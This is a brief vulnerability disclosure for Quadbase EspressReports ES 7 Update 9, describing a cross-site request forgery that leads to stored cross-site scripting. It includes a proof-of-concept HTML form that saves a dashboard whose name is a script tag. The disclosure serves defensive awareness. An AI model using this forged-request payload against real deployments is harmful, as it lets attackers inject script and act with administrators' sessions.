Quadbase – EspressReports ES – Version 7, Update 9 – Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS).
CSRF attacks can often lead to critical risk attacks such as privilege escalation via account takeover. It also allows completely unauthenticated attackers to use a target web application as if they were an admin, performing features that would otherwise be unaccessible.
CSRF Proof of Concept:
<form action="http://X.X.X.X:8080/ERES/DashboardBuilder/DB_OverWriteDashboard.jsp?ActionButton=save> <input type="hidden" name="DashboardName" value="<script>alert(1)</script>" /> <input type="hidden" name="SaveAgain" value="true" /> <input type="hidden" name="OrganizerFolderList" value="9" /> <input type="hidden" name="OrganizerNodePath" value="Examples" /> <input type="submit" value="Submit request" /> </form>